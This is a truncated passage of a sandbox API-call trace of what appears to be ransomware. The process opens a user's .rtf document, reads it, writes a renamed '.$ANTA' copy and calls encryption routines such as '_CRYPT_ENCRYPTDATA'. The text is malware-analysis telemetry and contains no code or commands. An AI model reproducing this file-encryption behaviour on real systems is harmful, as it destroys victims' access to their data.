0x43eb3a8 [0080.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0080.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0080.600] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\5R 2.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\5r 2.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0080.600] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.600] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0080.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0080.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0080.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0080.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0080.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0080.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0080.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.601] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0080.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0080.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0080.601] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0080.601] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0080.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0080.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0080.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4480 [0080.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0080.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0080.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4480 | out: hHeap=0x1780000) returned 1 [0080.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0080.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e298 [0080.603] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e298 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0080.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0080.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0080.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0080.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0080.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\5R 2.rtf.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\5r 2.rtf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0080.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0080.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0080.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0080.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0080.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.604] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0080.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0080.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0080.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0080.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0080.604] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0080.604] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0080.605] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0080.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0080.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0080.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0080.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0080.609] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0080.609] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x276a, lpOverlapped=0x0) returned 1 [0080.609] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0080.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x276a) returned 0x499a008 [0080.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0080.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0080.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0080.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x276a) returned 0x499c780 [0080.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0080.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.613] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x276a) returned 0x499a008 [0080.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0080.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0080.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.614] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0080.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0080.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0080.614] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0080.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0080.614] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0080.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0080.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a80 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x276a) returned 0x499a008 [0080.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2940 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2aa0 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a00 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0a8 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x276a) returned 0x499eef8 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0080.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0080.616] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0080.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0080.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0080.616] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0080.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0080.617] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0080.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0080.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 